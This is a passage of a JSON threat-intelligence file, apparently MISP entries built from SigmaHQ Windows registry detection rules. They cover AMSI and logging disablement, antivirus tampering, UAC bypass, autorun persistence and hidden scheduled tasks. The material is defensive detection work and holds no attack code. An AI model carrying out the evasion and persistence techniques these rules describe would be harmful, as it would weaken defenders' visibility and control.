"https://github.com/S3cur3Th1sSh1t/OffensiveVBA/blob/28cc6a2802d8176195ac19b3c8e9a749009a82a3/src/AMSIbypasses.vba", "https://www.microsoft.com/en-us/security/blog/2018/09/12/office-vba-amsi-parting-the-veil-on-malicious-macros/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_macroruntimescanscope.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "ab871450-37dc-4a3a-997f-6662aa8ae0f1", "value": "Disable Macro Runtime Scan Scope" }, { "description": "Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique)", "meta": { "author": "frack113", "creation_date": "2022-03-18", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_hide_function_user.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_function_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a93eb65-dffa-4543-b761-94aa60098fb6", "value": "Registry Hide Function from User" }, { "description": "Detects an attacker trying to enable the outlook security setting \"EnableUnsafeClientMailRules\" which allows outlook to run applications or execute macros", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-08", "falsepositive": [ "Unknown" ], "filename": "registry_set_office_outlook_enable_unsafe_client_mail_rules.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44", 
"https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_unsafe_client_mail_rules.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6763c6c8-bd01-4687-bc8d-4fa52cf8ba08", "value": "Outlook EnableUnsafeClientMailRules Setting Enabled - Registry" }, { "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-22", "falsepositive": [ "Unlikely" ], "filename": "registry_set_persistence_typed_paths.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://forensafe.com/blogs/typedpaths.html", "https://twitter.com/dez_/status/1560101453150257154", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" ], "tags": [ "attack.persistence" ] }, "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", "value": "Potential Persistence Via TypedPaths" }, { "description": "Detects execution of commands via the run dialog box on Windows by checking values of the \"RunMRU\" registry key.\nThis technique was seen being abused by threat actors to deceive users into pasting and executing malicious commands, often disguised as CAPTCHA verification steps.\n", "meta": { "author": "Ahmed Farouk, Nasreddine Bencherchali", "creation_date": "2024-11-01", "falsepositive": [ "Unknown" ], "filename": 
"registry_set_runmru_susp_command_execution.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redcanary.com/blog/threat-intelligence/intelligence-insights-october-2024/", "https://www.forensafe.com/blogs/runmrukey.html", "https://medium.com/@shaherzakaria8/downloading-trojan-lumma-infostealer-through-capatcha-1f25255a0e71", "https://medium.com/@ahmed.moh.farou2/fake-captcha-campaign-on-arabic-pirated-movie-sites-delivers-lumma-stealer-4f203f7adabf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_runmru_susp_command_execution.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a7df0e9e-91a5-459a-a003-4cde67c2ff5d", "value": "Potentially Suspicious Command Executed Via Run Dialog Box - Registry" }, { "description": "Detects that a powershell code is written to the registry as a service.", "meta": { "author": "oscd.community, Natalia Shornikova", "creation_date": "2020-10-06", "falsepositive": [ "Unknown" ], "filename": "registry_set_powershell_as_service.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" ], "tags": [ "attack.execution", "attack.t1569.002" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", "value": "PowerShell as a Service in Registry" }, { "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on 
sysinternals tool execution", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-24", "falsepositive": [ "Unlikely" ], "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" ], "tags": [ "attack.resource-development", "attack.t1588.002" ] }, "related": [ { "dest-uuid": "a2fdce72-04b2-409a-ac10-cc1695f4fce0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8023f872-3f1d-4301-a384-801889917ab4", "value": "Usage of Renamed Sysinternals Tools - RegistrySet" }, { "description": "Hides the file extension through modification of the registry", "meta": { "author": "frack113", "creation_date": "2022-01-22", "falsepositive": [ "Administrative scripts" ], "filename": "registry_set_change_security_zones.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone", "https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml" ], "tags": [ "attack.persistence", "attack.t1137" ] }, "related": [ { "dest-uuid": "2c4d4e92-0ccf-4a97-b54c-86d662988a53", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "45e112d0-7759-4c2a-aa36-9f8fb79d3393", "value": "IE Change Domain Zone" }, { "description": "Detects tamper attempts to sophos av functionality via registry key modification", 
"meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-02", "falsepositive": [ "Some FP may occur when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" ], "filename": "registry_set_sophos_av_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", "value": "Tamper With Sophos AV Registry Keys" }, { "description": "Detects tampering with the \"Enabled\" registry key in order to disable Windows logging of a Windows event channel", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-04", "falsepositive": [ "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "filename": "registry_set_disable_winevt_logging.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/DebugPrivilege/CPP/blob/c39d365617dbfbcb01fffad200d52b6239b2918c/Windows%20Defender/RestoreDefenderConfig.cpp", "https://twitter.com/WhichbufferArda/status/1543900539280293889", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_winevt_logging.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"2f78da12-f7c7-430b-8b19-a28f269b77a3", "value": "Disable Windows Event Logging Via Registry" }, { "description": "Detects potential WerFault \"ReflectDebugger\" registry value abuse for persistence.", "meta": { "author": "X__Junior", "creation_date": "2023-05-18", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_reflectdebugger.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://cocomelonc.github.io/malware/2022/11/02/malware-pers-18.html", "https://www.hexacorn.com/blog/2018/08/31/beyond-good-ol-run-key-part-85/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_reflectdebugger.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0cf2e1c6-8d10-4273-8059-738778f981ad", "value": "Potential WerFault ReflectDebugger Registry Value Abuse" }, { "description": "Detects when the 'AllowMultipleTSSessions' value is enabled.\nWhich allows for multiple Remote Desktop connection sessions to be opened at once.\nThis is often used by attacker as a way to connect to an RDP session without disconnecting the other users\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-09-09", "falsepositive": [ "Legitimate use of the multi session functionality" ], "filename": "registry_set_winlogon_allow_multiple_tssessions.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml" ], "tags": [ "attack.persistence", "attack.defense-evasion", "attack.t1112" ] }, "related": [ { 
"dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f7997770-92c3-4ec9-b112-774c4ef96f96", "value": "Winlogon AllowMultipleTSSessions Enable" }, { "description": "Detects the modification of the registry to allow a driver or service to persist in Safe Mode.", "meta": { "author": "frack113", "creation_date": "2022-04-04", "falsepositive": [ "Unknown" ], "filename": "registry_set_add_load_service_in_safe_mode.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-33---windows-add-registry-value-to-load-service-in-safe-mode-without-network", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-34---windows-add-registry-value-to-load-service-in-safe-mode-with-network", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_add_load_service_in_safe_mode.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "1547e27c-3974-43e2-a7d7-7f484fb928ec", "value": "Registry Persistence via Service in Safe Mode" }, { "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", "meta": { "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", "creation_date": "2022-05-04", "falsepositive": [ "Legitimate use of screen saver" ], "filename": "registry_set_scr_file_executed_by_rundll32.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ 
"https://twitter.com/pabraeken/status/998627081360695297", "https://twitter.com/VakninHai/status/1517027824984547329", "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.011" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", "value": "ScreenSaver Registry Key Set" }, { "description": "Detects changes to the \"TracingDisabled\" key in order to disable ETW logging for services.exe (SCM)", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-09", "falsepositive": [ "Unknown" ], "filename": "registry_set_services_etw_tamper.yml", "level": "low", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "http://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_services_etw_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112", "attack.t1562" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4f281b83-0200-4b34-bf35-d24687ea57c2", "value": "ETW Logging Disabled For SCM" }, { "description": "Detects when the enablement of developer features such as \"Developer Mode\" or \"Application Sideloading\". 
Which allows the user to install untrusted packages.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-12", "falsepositive": [ "Unknown" ], "filename": "registry_set_turn_on_dev_features.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://twitter.com/malmoeb/status/1560536653709598721", "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_turn_on_dev_features.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "b110ebaf-697f-4da1-afd5-b536fa27a2c1", "value": "Potential Signing Bypass Via Windows Developer Features - Registry" }, { "description": "Detects registry modifications that change features of internal Windows tools (malware like Agent Tesla uses this technique)", "meta": { "author": "frack113, Nasreddine Bencherchali (Nextron Systems), CrimpSec", "creation_date": "2022-03-18", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_disable_function_user.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", "https://www.malwarebytes.com/blog/detections/pum-optional-nodispcpl", "https://www.malwarebytes.com/blog/detections/pum-optional-nodispbackgroundpage", "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], 
"type": "related-to" } ], "uuid": "e2482f8d-3443-4237-b906-cc145d87a076", "value": "Disable Internal Tools or Feature in Registry" }, { "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_bypass_winsat.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_winsat.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "value": "UAC Bypass Abusing Winsat Path Parsing - Registry" }, { "description": "Detect set UseActionCenterExperience to 0 to disable the Windows security center notification", "meta": { "author": "frack113", "creation_date": "2022-08-19", "falsepositive": [ "Unknown" ], "filename": "registry_set_disable_security_center_notifications.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_security_center_notifications.yml" ], "tags": [ "attack.defense-evasion", "attack.t1112" ] }, "related": [ { "dest-uuid": "57340c81-c025-4189-8fa0-fc7ede51bae4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ae1a046-f7db-439d-b7ce-b8b366b81fa6", "value": "Disable Windows Security Center 
Notifications" }, { "description": "Detects registry modifications that disable Privacy Settings Experience", "meta": { "author": "frack113", "creation_date": "2022-10-02", "falsepositive": [ "Legitimate admin script" ], "filename": "registry_set_disable_privacy_settings_experience.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1562.001/T1562.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_privacy_settings_experience.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "value": "Disable Privacy Settings Experience in Registry" }, { "description": "Detects when the \"index\" value of a scheduled task is modified from the registry\nWhich effectively hides it from any tooling such as \"schtasks /query\" (Read the referenced link for more information about the effects of this technique)\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-26", "falsepositive": [ "Unlikely" ], "filename": "registry_set_hide_scheduled_task_via_index_tamper.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_scheduled_task_via_index_tamper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ 
"estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5b16df71-8615-4f7f-ac9b-6c43c0509e61", "value": "Hide Schedule Task Via Index Value Tamper" }, { "description": "Detects installation of new shim databases that try to patch sections of known processes for potential process injection or persistence.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-01", "falsepositive": [ "Unknown" ], "filename": "registry_set_persistence_shim_database_susp_application.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/pillowmint-fin7s-monkey-thief/", "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_susp_application.yml" ], "tags": [ "attack.persistence", "attack.t1546.011" ] }, "related": [ { "dest-uuid": "42fe883a-21ea-4cfb-b94a-78b6476dcc83", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bf344fea-d947-4ef4-9192-34d008315d3a", "value": "Suspicious Shim Database Patching Activity" }, { "description": "Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any\nanomalous executables with suspicious arguments. 
The downloaded file will be in C:\\Users\\redacted\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdaterreSignInSettingsConfig.json\n", "meta": { "author": "frack113", "creation_date": "2022-05-28", "falsepositive": [ "Unknown" ], "filename": "registry_set_lolbin_onedrivestandaloneupdater.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3aff0be0-7802-4a7e-a4fa-c60c74bc5e1d", "value": "Lolbas OneDriveStandaloneUpdater.exe Proxy Download" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "480421f9-417f-4d3b-9552-fd2728443ec8", "value": "Wow6432Node Windows NT CurrentVersion Autorun Keys Modification" }, { "description": "Detects when an attacker tries to change User Account Control (UAC) elevation request destination via the \"PromptOnSecureDesktop\" value.\nThe \"PromptOnSecureDesktop\" setting specifically determines whether UAC prompts are displayed on the secure desktop. The secure desktop is a separate desktop environment that's isolated from other processes running on the system. It's designed to prevent malicious software from intercepting or tampering with UAC prompts.\nWhen \"PromptOnSecureDesktop\" is set to 0, UAC prompts are displayed on the user's current desktop instead of the secure desktop. 
This reduces the level of security because it potentially exposes the prompts to manipulation by malicious software.\n", "meta": { "author": "frack113", "creation_date": "2024-05-10", "falsepositive": [ "Unknown" ], "filename": "registry_set_uac_disable_secure_desktop_prompt.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/7e11e9b79583545f208a6dc3fa062f2ed443d999/atomics/T1548.002/T1548.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_disable_secure_desktop_prompt.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0d7ceeef-3539-4392-8953-3dc664912714", "value": "UAC Secure Desktop Prompt Disabled" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split), wagga (name)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_common.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://persistence-info.github.io/Data/userinitmprlogonscript.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_common.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f59c3faf-50f3-464b-9f4c-1b67ab512d99", "value": "Common Autorun Keys Modification" }, { "description": "Detects modification of autostart extensibility point (ASEP) in registry.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", "Legitimate administrator sets up autorun keys for legitimate reason" ], "filename": "registry_set_asep_reg_keys_modification_session_manager.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://learn.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_session_manager.yml" ], "tags": [ "attack.persistence", "attack.t1547.001", "attack.t1546.009" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7d57b371-10c2-45e5-b3cc-83a8fb380e4c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "046218bd-e0d8-4113-a3c3-895a12b2b298", "value": "Session 
Manager Autorun Keys Modification" }, { "description": "Detects modifications to the \"Hidden\" and \"ShowSuperHidden\" explorer registry values in order to disable showing of hidden files and system files.\nThis technique is abused by several malware families to hide their files from normal users.\n", "meta": { "author": "frack113", "creation_date": "2022-04-02", "falsepositive": [ "Unknown" ], "filename": "registry_set_hide_file.yml", "level": "medium", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.001/T1564.001.md#atomic-test-8---hide-files-through-registry", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hide_file.yml" ], "tags": [ "attack.defense-evasion", "attack.t1564.001" ] }, "related": [ { "dest-uuid": "ec8fc7e2-b356-455c-8db5-2e37be158e7d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "5a5152f1-463f-436b-b2f5-8eceb3964b42", "value": "Displaying Hidden Files Feature Disabled" }, { "description": "Detects changes to \"DsrmAdminLogonBehavior\" registry value.\nDuring a Domain Controller (DC) promotion, administrators create a Directory Services Restore Mode (DSRM) local administrator account with a password that rarely changes. 
The DSRM account is an “Administrator” account that logs in with the DSRM mode when the server is booting up to restore AD backups or recover the server from a failure.\nAttackers could abuse DSRM account to maintain their persistence and access to the organization's Active Directory.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"0\", the administrator account can only be used if the DC starts in DSRM.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"1\", the administrator account can only be used if the local AD DS service is stopped.\nIf the \"DsrmAdminLogonBehavior\" value is set to \"2\", the administrator account can always be used.\n", "meta": { "author": "Nischal Khadgi", "creation_date": "2024-07-11", "falsepositive": [ "Unknown" ], "filename": "registry_set_dsrm_tampering.yml", "level": "high", "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ "https://adsecurity.org/?p=1785", "https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/dsrm-credentials", "https://www.sentinelone.com/blog/detecting-dsrm-account-misconfigurations/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dsrm_tampering.yml" ], "tags": [ "attack.persistence", "attack.t1556" ] }, "related": [ { "dest-uuid": "f4c1826f-a322-41cd-9557-562100848c84", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 